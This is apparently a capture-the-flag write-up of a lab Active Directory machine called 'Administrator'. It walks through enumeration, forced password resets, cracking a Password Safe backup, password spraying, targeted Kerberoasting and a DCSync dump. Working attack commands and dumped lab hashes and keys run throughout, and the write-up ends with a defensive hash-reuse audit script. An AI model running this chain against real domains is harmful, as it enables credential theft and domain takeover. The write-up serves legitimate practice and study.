Administrator Writeup

July 17, 2025

$ sudo nmap -p- -sCV -sS --min-rate 5000 -Pn -n --disable-arp-ping 10.129.136.29 -oN nmap/scan -vv

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-11 12:30:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
54058/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
54063/tcp open  msrpc         Microsoft Windows RPC
54074/tcp open  msrpc         Microsoft Windows RPC
54085/tcp open  msrpc         Microsoft Windows RPC
54121/tcp open  msrpc         Microsoft Windows RPC
62321/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 7h00m02s
| smb2-time:
|   date: 2024-11-11T12:31:56
|_  start_date: N/A

rpcclient

rpcclient -U 'Olivia'%'ichliebedich' 10.129.251.119 -c enumdomusers | cut -d '[' -f 2 | cut -d ']' -f 1 > user_rpcclient.txt

Administrator
Guest
krbtgt
olivia
michael
benjamin
emily
ethan
alexander
emma

nxc

❯ nxc smb 10.129.251.119 -u 'Olivia' -p 'ichliebedich' --shares

SMB  10.129.251.119  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB  10.129.251.119  445  DC  [+] administrator.htb\Olivia:ichliebedich
SMB  10.129.251.119  445  DC  [*] Enumerated shares
SMB  10.129.251.119  445  DC  Share     Permissions  Remark
SMB  10.129.251.119  445  DC  -----     -----------  ------
SMB  10.129.251.119  445  DC  ADMIN$                 Remote Admin
SMB  10.129.251.119  445  DC  C$                     Default share
SMB  10.129.251.119  445  DC  IPC$      READ         Remote IPC
SMB  10.129.251.119  445  DC  NETLOGON  READ         Logon server share
SMB  10.129.251.119  445  DC  SYSVOL    READ         Logon server share

No interesting files are found in the shares.

kerberos attack

[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

❯ sudo service virtualbox-guest-utils stop && sudo ntpdate 10.129.251.119
❯ python3 targetedKerberoast.py -u Olivia -p ichliebedich --dc-ip 10.129.251.119 -d administrator.htb

When we run the command we first need to synchronize our machine's clock with the domain controller (the scan already showed a clock skew of about seven hours, and Kerberos rejects requests outside its tolerance). Then we run it to obtain michael's hash, but it cannot be cracked.

Evil-WinRM

We try to connect with Evil-WinRM:

[~/htb/administrator]└─$ evil-winrm -i 10.10.11.42 -u Olivia
Enter Password:
PS C:\Users\olivia\Documents>

We find nothing of interest, only a couple of hints: SharpHound is installed, and there is an nc64 binary, which is a way of establishing a remote connection; when we run it, it asks for connection parameters.

Bloodhound

❯ bloodhound-python -u 'Olivia' -p 'ichliebedich' -d administrator.htb -c all --zip -ns 10.129.2


USER

Michael

❯ bloodyAD --host 10.129.251.119 -d administrator.htb -u olivia -p ichliebedich set password michael Cybersen123@

After taking over the user michael we may need to run BloodHound again with his credentials.

❯ bloodhound-python -u 'michael' -p 'Cybersen123@' -d administrator.htb -c all --zip -ns 10.129.251.119

We see that we have permission to change Benjamin's password.

Benjamin

❯ bloodyAD --host 10.129.251.119 -d administrator.htb -u michael -p 'Cybersen123@' set password Benjamin Cybersen123@

This way we can log in as Benjamin. We could keep running BloodHound if we wanted, but in this case we have to enumerate a share on FTP instead, as we saw in the reconnaissance stage.

Emily

$ nxc ftp administrator.htb -u 'benjamin' -p 'Cybersen123@' --ls
$ nxc ftp administrator.htb -u 'benjamin' -p 'Cybersen123@' --get Backup.psafe3

If we run file on it we can confirm that it is a genuine Password Safe database rather than an obfuscated file, so we proceed to extract a hash from it.

❯ pwsafe2john Backup.psafe3
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050

❯ john --list=formats | grep pwsafe
pwsafe, qnx, RACF, RACF-KDFAES, radius, RAdmin, RAKP, rar, RAR5, Raw-SHA512,

❯ john --format=pwsafe --wordlist=/usr/share/wordlists/rockyou.txt hash_backuppsafe3.txt
...
tekieromucho (Backu)

Install pwsafe3 on the Windows machine and open the database with that password. Then do password spraying with the passwords it contains:

nxc smb 10.129.251.119 -u user_rpcclient.txt -p passwords --continue-on-success

SMB  10.129.251.119  445  DC  [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

ROOT

Ethan

We take advantage of emily's GenericWrite permissions to run a targeted Kerberoast.

❯ python3 targetedKerberoast.py -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip 10.129.164.9 -d administrator.htb

We crack the hash:

❯ hashcat -m 131

DCSync Attack

Taking advantage of the DCSync rights to obtain the domain hashes as if we were the administrator.

└─$ python3 secretsdump.py administrator.htb/ethan:limpbizkit@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:986ced7b028e25984c4e2ad171d9ded5:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:986ced7b028e25984c4e2ad171d9ded5:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94

[*] Cleaning up...
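One thing worth noticing in the dump above is that michael and benjamin carry the identical NT hash, because both accounts were reset to the same password during the chain. As an added example (not code from the original writeup), the script below parses secretsdump-style credential lines and flags NT hashes shared by several accounts as well as accounts holding the empty-password hash, the kind of audit a defender runs over an NTDS dump to find password reuse; the sample input is a subset of the lines from the output above.

```python
import re
from collections import defaultdict

# NT hash of the empty password (MD4 of an empty UTF-16LE string); a well-known constant.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump credential line format: [domain\]user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?:[^\\:]+\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Sample input: a subset of the lines from the secretsdump output above,
# plus one status line to show that non-credential lines are skipped.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
administrator.htb\\michael:1109:aad3b435b51404eeaad3b435b51404ee:986ced7b028e25984c4e2ad171d9ded5:::
administrator.htb\\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:986ced7b028e25984c4e2ad171d9ded5:::
administrator.htb\\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
[*] Kerberos keys grabbed
"""


def parse_dump(text):
    """Return (user, rid, nt_hash) tuples for every credential line; other lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append((m.group("user"), int(m.group("rid")), m.group("nt")))
    return entries


def audit(entries):
    """Group accounts by NT hash; report hashes shared by several accounts
    (identical passwords) and accounts whose password is empty."""
    by_hash = defaultdict(list)
    for user, _rid, nt in entries:
        by_hash[nt].append(user)
    shared = {nt: users for nt, users in by_hash.items() if len(users) > 1}
    return {"shared": shared, "empty_password": by_hash.get(EMPTY_NT_HASH, [])}


if __name__ == "__main__":
    report = audit(parse_dump(SAMPLE_DUMP))
    for nt, users in report["shared"].items():
        print(f"[!] NT hash {nt} is shared by: {', '.join(users)}")
    for user in report["empty_password"]:
        print(f"[!] {user} has the empty-password NT hash")
```

The same check applies to any full NTDS export, where shared hashes usually point at copied passwords or at a helpdesk reset policy that sets one default value.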

GG!

Raúl Zavaleta

Cybersecurity enthusiast and eternal student.